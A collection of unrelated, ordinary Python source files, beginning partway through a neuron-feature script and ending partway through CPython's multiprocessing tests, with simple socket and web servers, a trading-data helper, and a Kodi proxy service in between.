outProps["edges"][edgeCounterMorphology].append(p2)
updateTraversalState(node_cube_branch, cube_branch_values, traversal_state, synapticSide, "lastStep")
rootDists[nodeEnd] = rd
if(boundsFilter is not None):
cube_branch_values = filterFeatures(boundsFilter, cube_branch_values)
if(cube_branch_values):
if(outputFolder):
if(synapticSide == "pre"):
util_feature_IO.writeAxonFeatures(outfile, cube_branch_values)
else:
util_feature_IO.writeDendriteFeatures(outfile, cube_branch_values)
else:
registerFeatures(neuronId, cube_branch_values, outProps)
print("batch {}: processed {} ({}/{})".format(batchDescriptor, neuronId, k+1, len(neuronIds)))
except Exception as e:
if(logFolder is not None):
with open(os.path.join(logFolder,"{}_error.txt".format(neuronId)), "w+") as f:
f.write("{}\n\n".format(neuronId))
f.write("{}\n\n".format(e))
f.write(traceback.format_exc())
print(traceback.format_exc())
print("batch {}: failed {} ({}/{})".format(batchDescriptor, neuronId, k+1, len(neuronIds)))
def printUsageAndExit(message):
if(message):
print("{}\n\n".format(message))
print("Usage:")
print("calc_features_mp.py network-dir synaptic_side grid-descriptor bounds num-workers [exclude-existing] [NID]")
print("")
print("network-dir: network directory")
print("synaptic_side: pre, post")
print("grid-descriptor: 50-50-50, 100-100-50")
print("bounds: all, ref-volume, C2-volume")
print("num-workers: 5, 6, ...")
print("exclude-exsiting: keep exisiting files in output directory (default: false)")
sys.exit(1)
if __name__ == '__main__':
if(len(sys.argv) not in [6,7,8]):
printUsageAndExit("Wrong number of arguments.")
networkDir = sys.argv[1]
synapticSide = sys.argv[2]
if(synapticSide not in ["pre", "post"]):
printUsageAndExit("Invalid synaptic side.")
gridDescriptor = sys.argv[3]
util_geometry.setGridSize(gridDescriptor)
boundsDescriptor = sys.argv[4]
if(boundsDescriptor not in ["all", "ref-volume", "C2-volume"]):
printUsageAndExit("Invalid bounds.")
outfolder = os.path.join(networkDir, "subcellular_features_{}synaptic_{}_{}".format(synapticSide, gridDescriptor, boundsDescriptor))
if(boundsDescriptor == "all"):
boundsDescriptor = None
numWorkers = int(sys.argv[5])
keepExisting = len(sys.argv) in [7,8]
if(len(sys.argv) == 8):
nid = int(sys.argv[7])
numWorkers = 1
else:
nid = None
if(not keepExisting):
print("clearing folder {}".format(outfolder))
util.makeCleanDir(outfolder)
batchname = "{}_{}".format(synapticSide, gridDescriptor)
batchfiles = util_batch.getBatchFiles(networkDir, synapticSide, gridDescriptor, boundsDescriptor, batchname, numWorkers, excludeExisting=keepExisting, nids=[nid])
for batchfile in batchfiles:
p = mp.Process(target=processBatch, args=(batchfile, synapticSide, gridDescriptor, boundsDescriptor, networkDir, outfolder,))
p.start()
|
__init__.py
|
import socket
from threading import Thread
import time
import sys
import os
from configparser import ConfigParser
from tornado.web import Application
from tornado.ioloop import IOLoop
import schedule
from .common.controllers import Error404Handler
from server.routes import get_handlers
from .database import connection
def get_settings(config):
return {
"static_path": os.path.join(os.getcwd(), 'server', 'common', 'resources'),
"static_url_prefix": "/resources/",
"template_path": os.path.join(os.getcwd(), 'server'),
"cookie_secret": config["Server"]["cookie_secret"],
"login_url": "/login",
"debug": True
}
def main():
# Thread(target=stop_tornado).start()
Thread(target=launch_schedule).start()
create_app()
# def stop_tornado():
# while not 'q' == input('Enter q to quit: \n'):
# pass
# IOLoop.instance().stop()
def create_app():
config = ConfigParser()
config.read('settings.ini')
connection.db_url = config['Database']['url']
settings = get_settings(config)
app = Application(get_handlers(), **settings, default_handler_class=Error404Handler)
# app.listen(int(config['Server']['port']), config['Server']['address'])
# print('running server on http://'+config['Server']['address']+':'+config['Server']['port'])
# print(socket.gethostbyname_ex(socket.gethostname()))
# print(socket.gethostbyname_ex(socket.gethos))
app.listen(int(config['Server']['port']), socket.gethostbyname(socket.gethostname()))
# app.listen(int(config['Server']['port']), "192.168.1.45")
print('running server on http://' + socket.gethostbyname(socket.gethostname()) + ':' + config['Server']['port'])
IOLoop.instance().start()
def launch_schedule():
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
sys.exit(int(main() or 0))
|
utils.py
|
from jesse.models.Candle import Candle
from jesse.models.Ticker import Ticker
from jesse.models.Trade import Trade
from jesse.models.Orderbook import Orderbook
import jesse.helpers as jh
import threading
import numpy as np
def store_candle_into_db(exchange: str, symbol: str, candle: np.ndarray):
"""
store candle into the database
"""
d = {
'id': jh.generate_unique_id(),
'symbol': symbol,
'exchange': exchange,
'timestamp': candle[0],
'open': candle[1],
'high': candle[3],
'low': candle[4],
'close': candle[2],
'volume': candle[5]
}
def async_save():
Candle.insert(**d).on_conflict_ignore().execute()
print(
jh.color(
'candle: {}-{}-{}: {}'.format(jh.timestamp_to_time(d['timestamp']), exchange, symbol, candle),
'blue'
)
)
# async call
threading.Thread(target=async_save).start()
def store_ticker_into_db(exchange: str, symbol: str, ticker: np.ndarray):
d = {
'id': jh.generate_unique_id(),
'timestamp': ticker[0],
'last_price': ticker[1],
'high_price': ticker[2],
'low_price': ticker[3],
'volume': ticker[4],
'symbol': symbol,
'exchange': exchange,
}
def async_save():
Ticker.insert(**d).on_conflict_ignore().execute()
print(
jh.color('ticker: {}-{}-{}: {}'.format(
jh.timestamp_to_time(d['timestamp']), exchange, symbol, ticker
), 'yellow')
)
# async call
threading.Thread(target=async_save).start()
def store_trade_into_db(exchange: str, symbol: str, trade: np.ndarray):
d = {
'id': jh.generate_unique_id(),
'timestamp': trade[0],
'price': trade[1],
'buy_qty': trade[2],
'sell_qty': trade[3],
'buy_count': trade[4],
'sell_count': trade[5],
'symbol': symbol,
'exchange': exchange,
}
def async_save():
Trade.insert(**d).on_conflict_ignore().execute()
print(
jh.color(
'trade: {}-{}-{}: {}'.format(
jh.timestamp_to_time(d['timestamp']), exchange, symbol, trade
),
'green'
)
)
# async call
threading.Thread(target=async_save).start()
def store_orderbook_into_db(exchange: str, symbol: str, orderbook: np.ndarray):
d = {
'id': jh.generate_unique_id(),
'timestamp': jh.now(),
'data': orderbook.dumps(),
'symbol': symbol,
'exchange': exchange,
}
def async_save():
Orderbook.insert(**d).on_conflict_ignore().execute()
print(
jh.color(
'orderbook: {}-{}-{}: [{}, {}], [{}, {}]'.format(
jh.timestamp_to_time(d['timestamp']), exchange, symbol,
# best ask
orderbook[0][0][0], orderbook[0][0][1],
# best bid
orderbook[1][0][0], orderbook[1][0][1]
),
'magenta'
)
)
# async call
threading.Thread(target=async_save).start()
def fetch_candles_from_db(exchange: str, symbol: str, start_date: int, finish_date: int) -> tuple:
candles_tuple = tuple(
Candle.select(
Candle.timestamp, Candle.open, Candle.close, Candle.high, Candle.low,
Candle.volume
).where(
Candle.timestamp.between(start_date, finish_date),
Candle.exchange == exchange,
Candle.symbol == symbol
).order_by(Candle.timestamp.asc()).tuples()
)
return candles_tuple
|
dev_servers.py
|
"""\
Examples
For the development.ini you must supply the paster app name:
%(prog)s development.ini --app-name app --init --clear
"""
from pkg_resources import resource_filename
from pyramid.paster import get_app
from multiprocessing import Process
import atexit
import logging
import os.path
import select
import shutil
import sys
import pdb
try:
import subprocess32 as subprocess
except ImportError:
import subprocess
EPILOG = __doc__
logger = logging.getLogger(__name__)
def nginx_server_process(prefix='', echo=False):
args = [
os.path.join(prefix, 'nginx'),
'-c', resource_filename('snovault', 'nginx-dev.conf'),
'-g', 'daemon off;'
]
process = subprocess.Popen(
args,
close_fds=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
if not echo:
process.stdout.close()
if echo:
print('Started: http://localhost:8000')
return process
def main():
import argparse
parser = argparse.ArgumentParser(
description="Run development servers", epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--app-name', help="Pyramid app name in configfile")
parser.add_argument('config_uri', help="path to configfile")
parser.add_argument('--clear', action="store_true", help="Clear existing data")
parser.add_argument('--init', action="store_true", help="Init database")
parser.add_argument('--load', action="store_true", help="Load test set")
parser.add_argument('--datadir', default='/tmp/snovault', help="path to datadir")
args = parser.parse_args()
logging.basicConfig()
# Loading app will have configured from config file. Reconfigure here:
logging.getLogger('snovault').setLevel(logging.INFO)
from snovault.tests import elasticsearch_fixture, postgresql_fixture
from snovault.elasticsearch import create_mapping
datadir = os.path.abspath(args.datadir)
pgdata = os.path.join(datadir, 'pgdata')
esdata = os.path.join(datadir, 'esdata')
if args.clear:
for dirname in [pgdata, esdata]:
if os.path.exists(dirname):
shutil.rmtree(dirname)
if args.init:
postgresql_fixture.initdb(pgdata, echo=True)
postgres = postgresql_fixture.server_process(pgdata, echo=True)
elasticsearch = elasticsearch_fixture.server_process(esdata, echo=True)
nginx = nginx_server_process(echo=True)
processes = [postgres, elasticsearch, nginx]
print_processes = []
@atexit.register
def cleanup_process():
for process in processes:
if process.poll() is None:
process.terminate()
for process in processes:
try:
for line in process.stdout:
sys.stdout.write(line.decode('utf-8'))
except IOError:
pass
process.wait()
for p in print_processes:
p.terminate()
if args.init:
app = get_app(args.config_uri, args.app_name)
create_mapping.run(app)
if args.load:
from pyramid.path import DottedNameResolver
load_test_data = app.registry.settings.get('snovault.load_test_data')
load_test_data = DottedNameResolver().resolve(load_test_data)
load_test_data(app)
print('Started. ^C to exit.')
stdouts = [p.stdout for p in processes]
def print_to_terminal(stdout):
while True:
for line in iter(stdout.readline, b''):
sys.stdout.write(line.decode('utf-8'))
readable, writable, err = select.select(stdouts, [], stdouts, 5)
for stdout in readable:
print_processes.append(Process(target=print_to_terminal, args=(stdout,)))
for stdout in err:
print_processes.append(Process(target=print_to_terminal, args=(stdout,)))
for p in print_processes:
p.start()
if __name__ == '__main__':
main()
|
main.py
|
#!/usr/bin/env python3
from sensor import sensor
from room_devices import room_devices
from mqtt import mqtt
# from instance import room_devices
from threading import Thread
import curses
import time
def salutation(screen):
screen.addstr(0, 0, "digite 0 para sair do programa")
screen.addstr(1, 0, "digite 1 para adicionar um novo dispositivo")
screen.addstr(2, 0, "digite 2 para setar o estado de um dispositivo")
screen.addstr(3, 0, "digite 3 para parar o alarme")
def input_str(screen, y_pos : int, lenght : int, instructions = "") -> str:
screen.clear()
screen.nodelay(False)
curses.echo()
screen.addstr(y_pos - 1, 0, instructions)
screen.refresh()
string = screen.getstr(y_pos, 0, lenght)
curses.noecho()
screen.nodelay(True)
return string.decode("utf-8")
# mqtt = Mqtt()
if __name__ == "__main__":
try:
polling = room_devices.run_polling()
screen = curses.initscr()
curses.noecho()
screen.nodelay(True)
flag = -1
y_pos = 4
while flag != ord("0"):
screen.clear()
salutation(screen)
room_devices.print_device(screen)
temp, hum = sensor()
screen.addstr(4, 0, f"cômodo central. Humidade: {hum} Temperatura {temp}")
if(flag == ord("1")):
room = input_str(screen,2,50,"digite o nome do cômodo")
input_device = input_str(screen,2,50,"digite o nome do dispositivo de entrada")
output_device = input_str(screen,2,50,"digite o nome do dispositivo de saída")
room_devices.esp_defined_device.update({
room : {
"in": input_device,
"out": output_device
}
})
flag_device = input_str(screen,2,1,"digite 1 para definir o dispositivo ou 0 para usar o padrão")
y_pos += 1
if(int(flag_device)):
matricula = input_str(screen,2,50,"digite a matricula")
mac = input_str(screen,2,50,"digite o endereço mac")
thread = Thread(target=mqtt,args = (screen,room,y_pos,matricula,mac), daemon=True)
thread.start()
else:
thread = Thread(target=mqtt,daemon=True,args = (screen,room,y_pos))
thread.start()
elif (flag == ord("2")):
room_name = input_str(screen, 2, 50, "digite o nome do cômodo")
state = bool(
int(
input_str(
screen,
2,
1,
"digite seu estado(1 ou 0)")))
room_devices.device_set(room_name, state)
elif (flag == ord("3")):
screen.clear()
try:
room_devices.alarm_handle.terminate()
screen.addstr(6, 0, "alarme desligado")
except AttributeError:
screen.addstr(6, 0, "alarme não foi inicializado")
flag = screen.getch()
time.sleep(1)
except Exception as err:
curses.endwin()
try:
# dealocating memory
room_devices.alarm_handle.close()
except:
pass
# it's easier to debug raising the error
raise err
curses.endwin()
try:
# dealocating memory
room_devices.alarm_handle.close()
except:
pass
|
TCPserver.py
|
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#pass of ip and port that server going to listen on
server.bind((bind_ip,bind_port))
#listen max 5 clients
server.listen(5)
print "[*] Listening on %s:%d" %(bind_ip, bind_port)
#client-handling thread
def handle_client(client_socket):
#print out what the client sends
request = client_socket.recv(1024)
print "[*] Received: %s" % request
#send back a packet
client_socket.send("Wellcome to Blackpy")
client_socket.close()
#waiting for an incoming connection
while True:
client,addr = server.accept() #<--- contected server
#client = client socket
#addr = remote connection detail
print "[*] Accepted connection from: %s:%d" %(addr[0],addr[1])
#create a new thread object that points to our handle_client function,
#pass the client socket object as an argument.
client_handler = threading.Thread(target=handle_client, args=(client,))
#start the thread to handle the client connection
client_handler.start()
|
System.py
|
# -*- coding: utf-8 -*-
"""Models the whole thing.
Process, controller and a main loop."""
import threading
import time
import logging
class System(object):
"""
Manages the whole system.
process is the current controlled process.
controller is the current controller.
The whole system is executed in a separate thread.
The timer is also realized as separate thread.
"""
def __init__(self,stepsize=0.01,process=None,controller=None,logger=None):
self.process = process #: process to control
self.controller = controller #: controller for calculating control values
self.logger = logger #: logging instance
self.stepsize = stepsize #: step size of loop for simulations in seconds
self.run = 0 #: main loop in in continuous run mode
self.run_event = threading.Event() #: controls the main loop's turn (if set make another turn)
self.main_thread = threading.Thread(target=self.main_loop) #: the main loop thread
self.main_thread.setDaemon(1)
self.main_thread.start()
self.timer_event = threading.Event() #: periodic trigger for main loop
self.timer_thread = threading.Thread(target=self.timer_loop) #: calculation time independent periodic trigger generator
self.timer_thread.setDaemon(1)
self.timer_thread.start()
def main_loop(self):
"""Realize main control loop as separate thread, so it can be
running independently of the GUI timers"""
while 1:
self.run_event.wait() # wait for start impulse
if not self.run: # if only a step reset start impulse
self.run_event.clear()
try:
if self.process:
input = self.process.getStateValues()
output = self.process.getDefaultControlValues()
t0 = time.time()
if self.controller:
self.controller.calculate(input,output)
t1 = time.time()
self.process.doStep(self.stepsize)
t2 = time.time()
self.process.setControlValues(output)
if self.logger:
self.logger.log(input,output)
logging.warn("Time for controller %fms, Time for process %fms",(t1-t0)*1000,(t2-t1)*1000)
else:
self.run = 0
self.run_event.clear()
except:
self.run = 0
self.run_event.clear()
import traceback
traceback.print_exc()
# if run mode and is simulated, wait for next activation
if self.run:# and not self.process.no_timer:
self.timer_event.wait()
self.timer_event.clear()
def timer_loop(self):
"""Realize a timer, using sleep is usually more precise
than using the GUI timer"""
while 1:
self.run_event.wait() # only when running
time.sleep(self.stepsize) # wait until next impulse
self.timer_event.set() # activate timer impulse
def start(self):
"""Start the main loop."""
self.run = 1
self.run_event.set()
def stop(self):
"""Stop the main loop."""
self.run = 0
self.run_event.clear()
def step(self):
"""Make a single step of the main loop. ( = stop after one step)"""
self.run = 0
self.run_event.set()
|
web.py
|
import socket
import os
import threading
import sys
import framework
import logging
logging.basicConfig(level=logging.DEBUG,
format="%(asctime)s-%(filename)s[lineno:%(lineno)d]-%(levelname)s-%(message)s",
filename="longging.log",
filemode="a")
# http协议的web服务器类
class HttpWebServer(object):
def __init__(self, port):
# 创建tcp服务端套接字
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 设置端口号复用
tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
# 绑定端口
tcp_server_socket.bind(("", port))
# 设置监听
tcp_server_socket.listen(128)
# 把tcp服务器的套接字作为web服务器对象的属性
self.tcp_server_socket = tcp_server_socket
# 处理客户端请求
# 用不到当前方法和当前类,使用静态方法,方法之间空一行,函数之间空两行
@staticmethod
def handle_client_request(new_socket):
# 接受客户端请求信息
recv_data = new_socket.recv(4096)
# 判断请求数据是否为空,为空退出函数
if len(recv_data) == 0:
new_socket.close()
return
# 对接受数据进行二进制解码
recv_content = recv_data.decode("utf-8")
# 对数据进行分割
request_list = recv_content.split(" ", maxsplit=2)
# 获取请求的资源路径
request_path = request_list[1]
print(request_path)
if request_path == "/":
request_path = "/index.html"
# 判断是否是动态资源请求,判断后缀.html为动态资源请求
if request_path.endswith(".html"):
"""动态资源请求"""
logging.info("动态资源请求" + request_path)
# 动态资源请求交由web框架处理,需要把请求参数传给web框架
# 准备给web框架的参数信息都要放到字典里
env = {
"request_path": request_path,
# 传入请求头信息,额外信息可以在字典里添加
}
# 使用框架处理动态资源请求
# 1.web框架需要把处理结果返回给web服务器
# 2.web服务器需要将返回结果封装成响应报文后返回给浏览器,包括status, headers, response_body
# 元组拆包
status, headers, response_body = framework.handle_request(env)
print(status, headers, response_body)
# 响应行
response_line = "HTTP/1.1 %s/r/n" % status
# 响应头
response_header = ""
for header in headers:
# 元组拆包,header是包含两个值的元组
response_header += "%s: %s\r\n" % header
# 响应报文
response_data = (response_line +
response_header +
"\r\n" +
response_body).encode("utf-8")
print(response_data)
# 发送响应报文给浏览器
new_socket.send(response_data)
# 关闭连接
new_socket.close()
else:
"""静态资源请求"""
logging.info("静态资源请求" + request_path)
# 判断文件是否存在
# 1.os.path.exits
# if not os.path.exists("static"+request_path):
# print("static"+request_path+"not exist")
# return
# 2.try-except
try:
# 打开文件读取数据 提示,这里使用rb模式,兼容打开图片文件
with open("static"+request_path, "rb") as file:
file_data = file.read()
except Exception as e:
# 代码执行到此,说明没有请求的文件,返回404
# 响应行
response_line = "HTTP/1.1 404 Not Found\r\n"
# 响应头
response_header = "Server: LRY/1.0\r\n"
# 空行
# 响应体
with open("static/error.html", "rb") as file:
file_data = file.read()
response_body = file_data
response = (response_line + response_header + "\r\n").encode("utf-8") + response_body
# response已经是二进制数据,不用再编码
# # 把数据编码成二进制
# response_data = response.encode("utf-8")
# 发送http响应格式数据
new_socket.send(response)
else:
# 代码执行到此,说明找到了请求文件,返回200
# 将数据封装成http响应报文发送给浏览器客户端
# 响应行
response_line = "HTTP/1.1 200 OK\r\n"
# 响应头
response_header = "Server: LRY/1.0\r\n"
# 空行
# 响应体
response_body = file_data
# 此时response_body是二进制,不能和字符串拼接,将前面字符串编码为二进制
response = (response_line + response_header + "\r\n").encode("utf-8") + response_body
# response已经是二进制数据,不用再编码
# # 把数据编码成二进制
# response_data = response.encode("utf-8")
# 发送http响应格式数据
new_socket.send(response)
finally:
# 关闭服务端套接字服务
new_socket.close()
# 启动服务器的方法
def start(self):
# 循环等待客户端请求
while True:
# 等待接受客户端连接请求
new_socket, ip_port = self.tcp_server_socket.accept()
# 代码执行到此,说明连接建立成功
# 使用对象来调用静态方法
sub_thread = threading.Thread(target=self.handle_client_request, args=(new_socket,))
# 设置守护主线程
sub_thread.setDaemon(True)
# 启动子线程
sub_thread.start()
def main():
# 获取终端命令行参数
params = sys.argv
if len(params) != 2:
print("执行命令格式如下:python XXX.py 9000")
logging.warning("在终端执行程序参数不等于2")
return
# 判断第二个参数是否时数字组成
if not params[1].isdigit():
print("执行命令格式如下:python XXX.py 9000")
logging.warning("在终端执行程序参数类型不是数字")
return
# 代码执行到此,说明命令行参数个数一定是2并且都是数字
port = int(params[1])
# 创建web服务器
web_server = HttpWebServer(port)
# 启动服务器
web_server.start()
# 判断是否是主程序
if __name__ == "__main__":
main()
|
service.py
|
# -*- coding: utf-8 -*-
from resources.lib import proxy
from codequick import Script
from codequick.script import Settings
import SocketServer
import threading
from xbmc import Monitor
from kodi_six import xbmcgui
def serveForever(handler):
try:
handler.serve_forever()
except Exception as e:
Script.log(e, lvl=Script.DEBUG)
pass
SocketServer.ThreadingTCPServer.allow_reuse_address = True
_PORT = 48996
handler = SocketServer.ThreadingTCPServer(("", _PORT), proxy.JioTVProxy)
t = threading.Thread(target=serveForever, args=(handler,))
t.setDaemon(True)
t.start()
if not Settings.get_boolean("popup"):
xbmcgui.Dialog().ok("JioTV Notification", "Now you can create your custom playlist from BotAllen Dashboard. [CR]Find out more at [B]https://botallen.com/#dashboard[/B] [CR][CR]If you like this add-on then consider donating from [B]https://botallen.com/#donate[/B] [CR][CR]Github: [B]https://github.com/botallen/repository.botallen[/B] [CR]Discord: [B]https://botallen.com/discord[/B] [CR][CR][I]You can disable this popup from settings[/I]")
monitor = Monitor()
while not monitor.abortRequested():
if monitor.waitForAbort(10):
handler.shutdown()
handler.server_close()
break
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import test.support
import test.support.script_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more revelant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
def latin(s):
return s.encode('latin')
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(100)
def test_terminate(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
p.terminate()
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
sys.stderr = open(testfn, 'w')
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
sys.stderr = open(testfn, 'w')
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
